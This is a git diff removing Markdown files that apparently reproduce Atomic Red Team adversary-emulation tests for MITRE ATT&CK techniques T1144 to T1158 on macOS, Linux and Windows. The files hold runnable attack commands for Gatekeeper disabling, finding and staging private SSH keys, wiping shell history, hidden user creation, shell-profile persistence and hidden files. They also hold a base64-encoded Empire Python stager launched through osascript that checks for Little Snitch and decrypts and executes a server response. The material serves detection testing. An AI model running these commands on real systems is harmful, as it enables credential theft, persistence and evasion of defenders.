@@ -1,43 +0,0 @@
-# T1144 - Gatekeeper Bypass
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1144)
-<blockquote>In macOS and OS X, when applications or programs are downloaded from the internet, there is a special attribute set on the file called <code>com.apple.quarantine</code>. This attribute is read by Apple's Gatekeeper defense program at execution time and provides a prompt to the user to allow or deny execution. 
-
-Apps loaded onto the system from USB flash drive, optical disk, external hard drive, or even from a drive shared over the local network won’t set this flag. Additionally, other utilities or events like drive-by downloads don’t necessarily set it either. This completely bypasses the built-in Gatekeeper check. (Citation: Methods of Mac Malware Persistence) The presence of the quarantine flag can be checked by the xattr command <code>xattr /path/to/MyApp.app</code> for <code>com.apple.quarantine</code>. Similarly, given sudo access or elevated permission, this attribute can be removed with xattr as well, <code>sudo xattr -r -d com.apple.quarantine /path/to/MyApp.app</code>. (Citation: Clearing quarantine attribute) (Citation: OceanLotus for OS X)
- 
-In typical operation, a file will be downloaded from the internet and given a quarantine flag before being saved to disk. When the user tries to open the file or application, macOS’s gatekeeper will step in and check for the presence of this flag. If it exists, then macOS will then prompt the user to confirmation that they want to run the program and will even provide the URL where the application came from. However, this is all based on the file being downloaded from a quarantine-savvy application. (Citation: Bypassing Gatekeeper)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Gatekeeper Bypass](#atomic-test-1---gatekeeper-bypass)
-
-
-<br/>
-
-## Atomic Test #1 - Gatekeeper Bypass
-Gatekeeper Bypass via command line
-
-**Supported Platforms:** macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| app_path | Path to app to be used | Path | myapp.app|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-sudo xattr -r -d com.apple.quarantine #{app_path}
-sudo spctl --master-disable
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1145.md b/Atomic_Threat_Coverage/Triggers/T1145.md
deleted file mode 100644
index 60c30c8..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1145.md
+++ /dev/null
@@ -1,138 +0,0 @@
-# T1145 - Private Keys
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1145)
-<blockquote>Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures. (Citation: Wikipedia Public Key Crypto)
-
-Adversaries may gather private keys from compromised systems for use in authenticating to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email. Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. Adversaries may also look in common key directories, such as <code>~/.ssh</code> for SSH keys on * nix-based systems or <code>C:\Users\(username)\.ssh\</code> on Windows.
-
-Private keys should require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line.
-
-Adversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates. (Citation: Kaspersky Careto) (Citation: Palo Alto Prince of Persia)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Private Keys](#atomic-test-1---private-keys)
-
-- [Atomic Test #2 - Discover Private SSH Keys](#atomic-test-2---discover-private-ssh-keys)
-
-- [Atomic Test #3 - Copy Private SSH Keys with CP](#atomic-test-3---copy-private-ssh-keys-with-cp)
-
-- [Atomic Test #4 - Copy Private SSH Keys with rsync](#atomic-test-4---copy-private-ssh-keys-with-rsync)
-
-
-<br/>
-
-## Atomic Test #1 - Private Keys
-Find private keys on the Windows file system.
-File extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, pfx, .cer, .p7b, .asc
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-dir c:\ /b /s .key | findstr /e .key
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Discover Private SSH Keys
-Discover private SSH keys on a macOS or Linux system.
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| output_file | Output file containing locations of SSH key files | path | /tmp/keyfile_locations.txt|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-find / -name id_rsa >> #{output_file}
-find / -name id_dsa >> #{output_file}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Copy Private SSH Keys with CP
-Copy private SSH keys on a Linux system to a staging folder using the `cp` command.
-
-**Supported Platforms:** Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| output_folder | Output folder containing copies of SSH private key files | path | /tmp/art-staging|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-mkdir #{output_folder}
-find / -name id_rsa -exec cp --parents {} #{output_folder} \;
-find / -name id_dsa -exec cp --parents {} #{output_folder} \;
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Copy Private SSH Keys with rsync
-Copy private SSH keys on a Linux or macOS system to a staging folder using the `rsync` command.
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| output_folder | Output folder containing copies of SSH private key files | path | /tmp/art-staging|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-mkdir #{output_folder}
-find / -name id_rsa -exec rsync -R {} #{output_folder} \;
-find / -name id_dsa -exec rsync -R {} #{output_folder} \;
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1146.md b/Atomic_Threat_Coverage/Triggers/T1146.md
deleted file mode 100644
index e4a0c0c..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1146.md
+++ /dev/null
@@ -1,165 +0,0 @@
-# T1146 - Clear Command History
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1146)
-<blockquote>macOS and Linux both keep track of the commands users type in their terminal so that users can easily remember what they've done. These logs can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user's home directory called <code>~/.bash_history</code>. The benefit of this is that it allows users to go back to commands they've used before in different sessions. Since everything typed on the command-line is saved, passwords passed in on the command line are also saved. Adversaries can abuse this by searching these files for cleartext passwords. Additionally, adversaries can use a variety of methods to prevent their own commands from appear in these logs such as <code>unset HISTFILE</code>, <code>export HISTFILESIZE=0</code>, <code>history -c</code>, <code>rm ~/.bash_history</code>.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Clear Bash history (rm)](#atomic-test-1---clear-bash-history-rm)
-
-- [Atomic Test #2 - Clear Bash history (echo)](#atomic-test-2---clear-bash-history-echo)
-
-- [Atomic Test #3 - Clear Bash history (cat dev/null)](#atomic-test-3---clear-bash-history-cat-devnull)
-
-- [Atomic Test #4 - Clear Bash history (ln dev/null)](#atomic-test-4---clear-bash-history-ln-devnull)
-
-- [Atomic Test #5 - Clear Bash history (truncate)](#atomic-test-5---clear-bash-history-truncate)
-
-- [Atomic Test #6 - Clear history of a bunch of shells](#atomic-test-6---clear-history-of-a-bunch-of-shells)
-
-
-<br/>
-
-## Atomic Test #1 - Clear Bash history (rm)
-Clears bash history via rm
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-rm ~/.bash_history
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Clear Bash history (echo)
-Clears bash history via rm
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-echo "" > ~/.bash_history
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Clear Bash history (cat dev/null)
-Clears bash history via cat /dev/null
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-cat /dev/null > ~/.bash_history
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Clear Bash history (ln dev/null)
-Clears bash history via a symlink to /dev/null
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-ln -sf /dev/null ~/.bash_history
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Clear Bash history (truncate)
-Clears bash history via truncate
-
-**Supported Platforms:** Linux
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-truncate -s0 ~/.bash_history
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - Clear history of a bunch of shells
-Clears the history of a bunch of different shell types by setting the history size to zero
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-unset HISTFILE
-export HISTFILESIZE=0
-history -c
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1147.md b/Atomic_Threat_Coverage/Triggers/T1147.md
deleted file mode 100644
index baf3647..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1147.md
+++ /dev/null
@@ -1,38 +0,0 @@
-# T1147 - Hidden Users
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1147)
-<blockquote>Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in <code>/Library/Preferences/com.apple.loginwindow</code> called <code>Hide500Users</code> that prevents users with userIDs 500 and lower from appearing at the login screen. By using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 and enabling this property (setting it to Yes), an adversary can hide their user accounts much more easily: <code>sudo dscl . -create /Users/username UniqueID 401</code> (Citation: Cybereason OSX Pirrit).</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Hidden Users](#atomic-test-1---hidden-users)
-
-
-<br/>
-
-## Atomic Test #1 - Hidden Users
-Add a hidden user on MacOS
-
-**Supported Platforms:** macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| user_name | username to add | string | APT|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-sudo dscl . -create /Users/#{user_name} UniqueID 333
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1148.md b/Atomic_Threat_Coverage/Triggers/T1148.md
deleted file mode 100644
index 1f2e11c..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1148.md
+++ /dev/null
@@ -1,63 +0,0 @@
-# T1148 - HISTCONTROL
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1148)
-<blockquote>The <code>HISTCONTROL</code> environment variable keeps track of what should be saved by the <code>history</code> command and eventually into the <code>~/.bash_history</code> file when a user logs out. This setting can be configured to ignore commands that start with a space by simply setting it to "ignorespace". <code>HISTCONTROL</code> can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. <code>HISTCONTROL</code> does not exist by default on macOS, but can be set by the user and will be respected. Adversaries can use this to operate without leaving traces by simply prepending a space to all of their terminal commands.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Disable history collection](#atomic-test-1---disable-history-collection)
-
-- [Atomic Test #2 - Mac HISTCONTROL](#atomic-test-2---mac-histcontrol)
-
-
-<br/>
-
-## Atomic Test #1 - Disable history collection
-Disables history collection in shells
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| evil_command | Command to run after shell history collection is disabled | String | whoami|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-export HISTCONTROL=ignoreboth
-ls #{evil_command}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Mac HISTCONTROL
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-#### Run it with these steps! 
-1. export HISTCONTROL=ignoreboth
-2. echo export "HISTCONTROL=ignoreboth" >> ~/.bash_profile
-3. ls
-4. whoami > recon.txt
-
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1150.md b/Atomic_Threat_Coverage/Triggers/T1150.md
deleted file mode 100644
index 8ec947c..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1150.md
+++ /dev/null
@@ -1,38 +0,0 @@
-# T1150 - Plist Modification
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1150)
-<blockquote>Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as <code>/Library/Preferences</code> (which execute with elevated privileges) and <code>~/Library/Preferences</code> (which execute with a user's privileges). 
-Adversaries can modify these plist files to point to their own code, can use them to execute their code in the context of another user, bypass whitelisting procedures, or even use them as a persistence mechanism. (Citation: Sofacy Komplex Trojan)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Plist Modification](#atomic-test-1---plist-modification)
-
-
-<br/>
-
-## Atomic Test #1 - Plist Modification
-Modify MacOS plist file in one of two directories
-
-**Supported Platforms:** macOS
-
-
-
-
-#### Run it with these steps! 
-1. Modify a .plist in
-
-    /Library/Preferences
-
-    OR
-
-    ~/Library/Preferences
-
-2. Subsequently, follow the steps for adding and running via [Launch Agent](Persistence/Launch_Agent.md)
-
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1151.md b/Atomic_Threat_Coverage/Triggers/T1151.md
deleted file mode 100644
index 0094d06..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1151.md
+++ /dev/null
@@ -1,35 +0,0 @@
-# T1151 - Space after Filename
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1151)
-<blockquote>Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system. For example, if there is a Mach-O executable file called evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to evil.txt, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to "evil.txt " (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back). 
-
-Adversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Space After Filename](#atomic-test-1---space-after-filename)
-
-
-<br/>
-
-## Atomic Test #1 - Space After Filename
-Space After Filename
-
-**Supported Platforms:** macOS
-
-
-
-
-#### Run it with these steps! 
-1. echo '#!/bin/bash\necho "print \"hello, world!\"" | /usr/bin/python\nexit' > execute.txt && chmod +x execute.txt
-
-2. mv execute.txt "execute.txt "
-
-3. ./execute.txt\ 
-
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1152.md b/Atomic_Threat_Coverage/Triggers/T1152.md
deleted file mode 100644
index 475adb5..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1152.md
+++ /dev/null
@@ -1,35 +0,0 @@
-# T1152 - Launchctl
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1152)
-<blockquote>Launchctl controls the macOS launchd process which handles things like launch agents and launch daemons, but can execute other commands or programs itself. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input. By loading or reloading launch agents or launch daemons, adversaries can install persistence or execute changes they made  (Citation: Sofacy Komplex Trojan). Running a command from launchctl is as simple as <code>launchctl submit -l <labelName> -- /Path/to/thing/to/execute "arg" "arg" "arg"</code>. Loading, unloading, or reloading launch agents or launch daemons can require elevated privileges. 
-
-Adversaries can abuse this functionality to execute code or even bypass whitelisting if launchctl is an allowed process.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Launchctl](#atomic-test-1---launchctl)
-
-
-<br/>
-
-## Atomic Test #1 - Launchctl
-Utilize launchctl
-
-**Supported Platforms:** macOS
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1153.md b/Atomic_Threat_Coverage/Triggers/T1153.md
deleted file mode 100644
index f2f093e..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1153.md
+++ /dev/null
@@ -1,65 +0,0 @@
-# T1153 - Source
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1153)
-<blockquote>The <code>source</code> command loads functions into the current shell or executes files in the current context. This built-in command can be run in two different ways <code>source /path/to/filename [arguments]</code> or <code>. /path/to/filename [arguments]</code>. Take note of the space after the ".". Without a space, a new shell is created that runs the program instead of running the program within the current context. This is often used to make certain features or functions available to a shell or to update a specific shell's environment.(Citation: Source Manual)
-
-Adversaries can abuse this functionality to execute programs. The file executed with this technique does not need to be marked executable beforehand.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Execute Script using Source](#atomic-test-1---execute-script-using-source)
-
-- [Atomic Test #2 - Execute Script using Source Alias](#atomic-test-2---execute-script-using-source-alias)
-
-
-<br/>
-
-## Atomic Test #1 - Execute Script using Source
-Creates a script and executes it using the source command
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
-chmod +x /tmp/art.sh
-source /tmp/art.sh
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Execute Script using Source Alias
-Creates a script and executes it using the source command's dot alias
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
-chmod +x /tmp/art.sh
-. /tmp/art.sh
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1154.md b/Atomic_Threat_Coverage/Triggers/T1154.md
deleted file mode 100644
index fdfc694..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1154.md
+++ /dev/null
@@ -1,37 +0,0 @@
-# T1154 - Trap
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1154)
-<blockquote>The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common  keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>. Adversaries can use this to register code to be executed when the shell encounters specific interrupts either to gain execution or as a persistence mechanism. Trap commands are of the following format <code>trap 'command list' signals</code> where "command list" will be executed when "signals" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Trap](#atomic-test-1---trap)
-
-
-<br/>
-
-## Atomic Test #1 - Trap
-After exiting the shell, the script will download and execute.
-
-After sending a keyboard interrupt (CTRL+C) the script will download and execute.
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-trap "nohup sh $PathToAtomicsFolder/T1154/src/echo-art-fish.sh | bash" EXIT
-exit
-trap "nohup sh $PathToAtomicsFolder/T1154/src/echo-art-fish.sh | bash" SIGINt
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1155.md b/Atomic_Threat_Coverage/Triggers/T1155.md
deleted file mode 100644
index bbe262f..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1155.md
+++ /dev/null
@@ -1,40 +0,0 @@
-# T1155 - AppleScript
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1155)
-<blockquote>macOS and OS X applications send AppleEvent messages to each other for interprocess communications (IPC). These messages can be easily scripted with AppleScript for local or remote IPC. Osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the <code>osalang</code> program.
-AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely. 
-
-Adversaries can use this to interact with open SSH connection, move to remote machines, and even present users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they're already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via python  (Citation: Macro Malware Targets Macs). Scripts can be run from the command-line via <code>osascript /path/to/script</code> or <code>osascript -e "script here"</code>.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - AppleScript](#atomic-test-1---applescript)
-
-
-<br/>
-
-## Atomic Test #1 - AppleScript
-Shell Script with AppleScript. The encoded python script will perform an HTTP GET request to 127.0.0.1:80 with a session cookie of "t3VhVOs/DyCcDTFzIKanRxkvk3I=", unless 'Little Snitch' is installed, in which case it will just exit. 
-You can use netcat to listen for the connection and verify execution, e.g. use "nc -l 80" in another terminal window before executing this test and watch for the request.
-
-Note: If you want to run this command manually on the command line use 'sh -c "<command>"'
-Reference: https://github.com/EmpireProject/Empire
-
-**Supported Platforms:** macOS
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-osascript -e \"do shell script \\\"echo \\\\\\\"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEpLnJlYWQoKTsKSVY9YVswOjRdO2RhdGE9YVs0Ol07a2V5PUlWKyc4Yzk0OThmYjg1YmQ1MTE5ZGQ5ODQ4MTJlZTVlOTg5OSc7UyxqLG91dD1yYW5nZSgyNTYpLDAsW10KZm9yIGkgaW4gcmFuZ2UoMjU2KToKICAgIGo9KGorU1tpXStvcmQoa2V5W2klbGVuKGtleSldKSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCmk9aj0wCmZvciBjaGFyIGluIGRhdGE6CiAgICBpPShpKzEpJTI1NgogICAgaj0oaitTW2ldKSUyNTYKICAgIFNbaV0sU1tqXT1TW2pdLFNbaV0KICAgIG91dC5hcHBlbmQoY2hyKG9yZChjaGFyKV5TWyhTW2ldK1Nbal0pJTI1Nl0pKQpleGVjKCcnLmpvaW4ob3V0KSkK'));\\\\\\\" | python &\\\"\"
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1156.md b/Atomic_Threat_Coverage/Triggers/T1156.md
deleted file mode 100644
index 678c35a..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1156.md
+++ /dev/null
@@ -1,73 +0,0 @@
-# T1156 - .bash_profile and .bashrc
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1156)
-<blockquote><code>~/.bash_profile</code> and <code>~/.bashrc</code> are shell scripts that contain shell commands. These files are executed in a user's context when a new shell opens or when a user logs in so that their environment is set correctly. <code>~/.bash_profile</code> is executed for login shells and <code>~/.bashrc</code> is executed for interactive non-login shells. This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), the <code>~/.bash_profile</code> script is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, the <code>~/.bashrc</code> script is executed. This allows users more fine-grained control over when they want certain commands executed. These shell scripts are meant to be written to by the local user to configure their own environment. 
-
-The macOS Terminal.app is a little different in that it runs a login shell by default each time a new terminal window is opened, thus calling <code>~/.bash_profile</code> each time instead of <code>~/.bashrc</code>.
-
-Adversaries may abuse these shell scripts by inserting arbitrary shell commands that may be used to execute other binaries to gain persistence. Every time the user logs in or opens a new shell, the modified ~/.bash_profile and/or ~/.bashrc scripts will be executed.(Citation: amnesia malware).</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Add command to .bash_profile](#atomic-test-1---add-command-to-bash_profile)
-
-- [Atomic Test #2 - Add command to .bashrc](#atomic-test-2---add-command-to-bashrc)
-
-
-<br/>
-
-## Atomic Test #1 - Add command to .bash_profile
-Adds a command to the .bash_profile file of the current user
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| command_to_add | Command to add to the .bash_profile file | string | /path/to/script.py|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-echo "#{command_to_add}" >> ~/.bash_profile
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Add command to .bashrc
-Adds a command to the .bashrc file of the current user
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| command_to_add | Command to add to the .bashrc file | string | /path/to/script.py|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-echo "#{command_to_add}" >> ~/.bashrc
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1158.md b/Atomic_Threat_Coverage/Triggers/T1158.md
deleted file mode 100644
index 9829931..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1158.md
+++ /dev/null
@@ -1,368 +0,0 @@
-# T1158 - Hidden Files and Directories
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1158)
-<blockquote>To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls –a</code> for Linux and macOS).
-
-Adversaries can use this to their advantage to hide files and folders anywhere on the system for persistence and evading a typical user or system analysis that does not incorporate investigation of hidden files.
-
-### Windows
-
-Users can mark specific files as hidden by using the attrib.exe binary. Simply do <code>attrib +h filename</code> to mark a file or folder as hidden. Similarly, the “+s” marks a file as a system file and the “+r” flag marks the file as read only. Like most windows binaries, the attrib.exe binary provides the ability to apply these changes recursively “/S”.
-
-### Linux/Mac
-
-Users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name  (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folder that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable. For command line usages, there is typically a flag to see all files (including hidden ones). To view these files in the Finder Application, the following command must be executed: <code>defaults write com.apple.finder AppleShowAllFiles YES</code>, and then relaunch the Finder Application.
-
-### Mac
-
-Files on macOS can be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker).
-Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Create a hidden file in a hidden directory](#atomic-test-1---create-a-hidden-file-in-a-hidden-directory)
-
-- [Atomic Test #2 - Mac Hidden file](#atomic-test-2---mac-hidden-file)
-
-- [Atomic Test #3 - Create Windows System File with Attrib](#atomic-test-3---create-windows-system-file-with-attrib)
-
-- [Atomic Test #4 - Create Windows Hidden File with Attrib](#atomic-test-4---create-windows-hidden-file-with-attrib)
-
-- [Atomic Test #5 - Hidden files](#atomic-test-5---hidden-files)
-
-- [Atomic Test #6 - Hide a Directory](#atomic-test-6---hide-a-directory)
-
-- [Atomic Test #7 - Show all hidden files](#atomic-test-7---show-all-hidden-files)
-
-- [Atomic Test #8 - Create ADS command prompt](#atomic-test-8---create-ads-command-prompt)
-
-- [Atomic Test #9 - Create ADS PowerShell](#atomic-test-9---create-ads-powershell)
-
-
-<br/>
-
-## Atomic Test #1 - Create a hidden file in a hidden directory
-Creates a hidden file inside a hidden directory
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-mkdir /var/tmp/.hidden-directory
-echo "T1158" > /var/tmp/.hidden-directory/.hidden-file
-```
-
-#### Cleanup Commands:
-```sh
-rm -rf /var/tmp/.hidden-directory/
-```
-
-
-
-
-
-<br/>
-<br/>
-
